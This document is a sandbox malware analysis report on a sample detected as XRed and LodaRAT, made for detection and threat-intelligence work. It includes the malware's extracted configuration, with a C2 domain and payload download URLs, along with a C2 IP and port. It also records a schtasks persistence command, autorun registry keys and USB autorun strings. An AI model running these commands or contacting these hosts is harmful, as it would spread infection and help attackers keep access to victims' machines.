Edit tour

Windows Analysis Report
FGNEBI.exe

Overview

General Information

Sample name:	FGNEBI.exe
Analysis ID:	1582341
MD5:	1585cb2963dceb92fbcf6c4c057e191e
SHA1:	2063f45e9c82553bbc41cb4bc8e10b2d06d701c9
SHA256:	67d5fc80b6bf87eb6bc3d505b0102cfdf8e8727d3da004d982467ab08ded7f0b
Tags:	exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LodaRAT

Yara detected XRed

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Drops PE files to the document folder of the user

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE file contains executable resources (Code or Archives)

Potential key logger detected (key state polling based)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected ProcessChecker

Classification

Process Tree

System is w10x64

FGNEBI.exe (PID: 7916 cmdline: "C:\Users\user\Desktop\FGNEBI.exe" MD5: 1585CB2963DCEB92FBCF6C4C057E191E)

._cache_FGNEBI.exe (PID: 8008 cmdline: "C:\Users\user\Desktop\._cache_FGNEBI.exe" MD5: 66A4951D384B55633AB61ADD85514F07)

cmd.exe (PID: 8140 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1644 cmdline: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)

wscript.exe (PID: 8180 cmdline: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs MD5: FF00E0480075B095948000BDC66E81F0)

Synaptics.exe (PID: 8036 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 84A6CCB0838DA0E05CC6763275C2EE1C)

WerFault.exe (PID: 1976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 3840 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7932 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 1292 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 4568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2772 MD5: C31336C1EFC2CCB44B4326EA793040F2)

EXCEL.EXE (PID: 8104 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)

DELPQB.exe (PID: 1772 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: 66A4951D384B55633AB61ADD85514F07)

DELPQB.exe (PID: 2340 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: 66A4951D384B55633AB61ADD85514F07)

Synaptics.exe (PID: 4936 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 84A6CCB0838DA0E05CC6763275C2EE1C)

DELPQB.exe (PID: 4352 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: 66A4951D384B55633AB61ADD85514F07)

DELPQB.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: 66A4951D384B55633AB61ADD85514F07)

DELPQB.exe (PID: 3340 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: 66A4951D384B55633AB61ADD85514F07)

DELPQB.exe (PID: 7980 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: 66A4951D384B55633AB61ADD85514F07)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loda, LodaRAT	Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.	No Attribution	https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html https://blog.talosintelligence.com/attributing-yorotrooper/ https://blog.talosintelligence.com/get-a-loda-this/	https://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
FGNEBI.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
FGNEBI.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\WLJOQW.vbs	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
C:\ProgramData\Synaptics\RCX5CF5.tmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\RCX5CF5.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\Documents\~$cache1	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\Users\user\Documents\~$cache1	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000002.00000002.2668876953.000000000485E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2669135026.00000000048EE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
00000007.00000002.2657472452.0000000000B90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
00000007.00000002.2657921440.0000000000C48000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
Process Memory Space: FGNEBI.exe PID: 7916	JoeSecurity_XRed	Yara detected XRed	Joe Security
Process Memory Space: ._cache_FGNEBI.exe PID: 8008	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Process Memory Space: ._cache_FGNEBI.exe PID: 8008	JoeSecurity_LodaRAT	Yara detected LodaRAT	Joe Security
Process Memory Space: ._cache_FGNEBI.exe PID: 8008	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Synaptics.exe PID: 8036	JoeSecurity_XRed	Yara detected XRed	Joe Security
Process Memory Space: wscript.exe PID: 8180	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.FGNEBI.exe.400000.0.unpack	JoeSecurity_XRed	Yara detected XRed	Joe Security
0.0.FGNEBI.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_FGNEBI.exe, Initiated: true, ProcessId: 8008, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49727

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_FGNEBI.exe" , ParentImage: C:\Users\user\Desktop\._cache_FGNEBI.exe, ParentProcessId: 8008, ParentProcessName: ._cache_FGNEBI.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ProcessId: 8180, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_FGNEBI.exe" , ParentImage: C:\Users\user\Desktop\._cache_FGNEBI.exe, ParentProcessId: 8008, ParentProcessName: ._cache_FGNEBI.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ProcessId: 8180, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_FGNEBI.exe" , ParentImage: C:\Users\user\Desktop\._cache_FGNEBI.exe, ParentProcessId: 8008, ParentProcessName: ._cache_FGNEBI.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ProcessId: 8180, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_FGNEBI.exe, ProcessId: 8008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WLJOQW

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_FGNEBI.exe, ProcessId: 8008, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnk

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, CommandLine: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8140, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, ProcessId: 1644, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_FGNEBI.exe" , ParentImage: C:\Users\user\Desktop\._cache_FGNEBI.exe, ParentProcessId: 8008, ParentProcessName: ._cache_FGNEBI.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ProcessId: 8180, ProcessName: wscript.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\FGNEBI.exe, ProcessId: 7916, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 8036, TargetFilename: C:\Users\user\AppData\Local\Temp\JUIlYPbf.xlsm

Suricata Signatures

ET MALWARE Snake Keylogger Payload Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:34:30.542679+0100	2044887	1	A Network Trojan was detected	192.168.2.8	49712	172.217.16.206	443	TCP
2024-12-30T11:34:30.560462+0100	2044887	1	A Network Trojan was detected	192.168.2.8	49711	172.217.16.206	443	TCP
2024-12-30T11:34:31.719148+0100	2044887	1	A Network Trojan was detected	192.168.2.8	49716	172.217.16.206	443	TCP
2024-12-30T11:34:31.719400+0100	2044887	1	A Network Trojan was detected	192.168.2.8	49717	172.217.16.206	443	TCP
2024-12-30T11:34:38.590833+0100	2044887	1	A Network Trojan was detected	192.168.2.8	49723	172.217.16.206	443	TCP
2024-12-30T11:34:38.619255+0100	2044887	1	A Network Trojan was detected	192.168.2.8	49724	172.217.16.206	443	TCP

ETPRO MALWARE Loda Logger CnC Beacon

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:34:32.378978+0100	2822116	1	Malware Command and Control Activity Detected	192.168.2.8	49727	172.111.138.100	5552	TCP
2024-12-30T11:35:08.620830+0100	2822116	1	Malware Command and Control Activity Detected	192.168.2.8	49744	172.111.138.100	5552	TCP
2024-12-30T11:35:44.894680+0100	2822116	1	Malware Command and Control Activity Detected	192.168.2.8	49752	172.111.138.100	5552	TCP
2024-12-30T11:36:21.071387+0100	2822116	1	Malware Command and Control Activity Detected	192.168.2.8	49756	172.111.138.100	5552	TCP

ETPRO MALWARE W32.Bloat-A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:34:30.992449+0100	2832617	1	Malware Command and Control Activity Detected	192.168.2.8	49715	69.42.215.252	80	TCP

ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49740	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49742	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49727	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49754	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49743	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49749	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49746	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49753	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49744	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49755	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49756	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49752	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49747	172.111.138.100	5552	TCP
2024-12-30T11:34:32.378978+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49727	172.111.138.100	5552	TCP
2024-12-30T11:34:41.461796+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49740	172.111.138.100	5552	TCP
2024-12-30T11:34:50.555738+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49742	172.111.138.100	5552	TCP
2024-12-30T11:34:59.575488+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49743	172.111.138.100	5552	TCP
2024-12-30T11:35:08.620830+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49744	172.111.138.100	5552	TCP
2024-12-30T11:35:17.680424+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49746	172.111.138.100	5552	TCP
2024-12-30T11:35:26.770725+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49747	172.111.138.100	5552	TCP
2024-12-30T11:35:35.884801+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49749	172.111.138.100	5552	TCP
2024-12-30T11:35:44.894680+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49752	172.111.138.100	5552	TCP
2024-12-30T11:35:53.901669+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49753	172.111.138.100	5552	TCP
2024-12-30T11:36:02.973449+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49754	172.111.138.100	5552	TCP
2024-12-30T11:36:11.993456+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49755	172.111.138.100	5552	TCP
2024-12-30T11:36:21.071387+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.8	49756	172.111.138.100	5552	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FGNEBI.exe	Avira: detected
Source: FGNEBI.exe	Avira: detected

Antivirus detection for URL or domain

Source: http://xred.site50.net/syn/Synaptics.rarh	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dlD	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\WLJOQW.vbs	Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\ProgramData\Synaptics\RCX5CF5.tmp	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX5CF5.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\~$cache1	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\~$cache1	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006

Found malware configuration

Source: FGNEBI.exe

Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Synaptics\RCX5CF5.tmp	ReversingLabs: Detection: 100%
Source: C:\ProgramData\Synaptics\Synaptics.exe	ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\Documents\~$cache1	ReversingLabs: Detection: 100%

Multi AV Scanner detection for submitted file

Source: FGNEBI.exe	ReversingLabs: Detection: 92%
Source: FGNEBI.exe	Virustotal: Detection: 87%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.4% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\Synaptics\RCX5CF5.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\~$cache1	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FGNEBI.exe

Joe Sandbox ML: detected

Source: FGNEBI.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.8:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49724 version: TLS 1.2

Source: FGNEBI.exe, 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: FGNEBI.exe, 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: FGNEBI.exe, 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: autorun.inf
Source: Synaptics.exe, 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: autorun.inf
Source: FGNEBI.exe	Binary or memory string: [autorun]
Source: FGNEBI.exe	Binary or memory string: [autorun]
Source: FGNEBI.exe	Binary or memory string: autorun.inf
Source: RCX5CF5.tmp.0.dr	Binary or memory string: [autorun]
Source: RCX5CF5.tmp.0.dr	Binary or memory string: [autorun]
Source: RCX5CF5.tmp.0.dr	Binary or memory string: autorun.inf
Source: Synaptics.exe.0.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.0.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.0.dr	Binary or memory string: autorun.inf
Source: ~$cache1.3.dr	Binary or memory string: [autorun]
Source: ~$cache1.3.dr	Binary or memory string: [autorun]
Source: ~$cache1.3.dr	Binary or memory string: autorun.inf

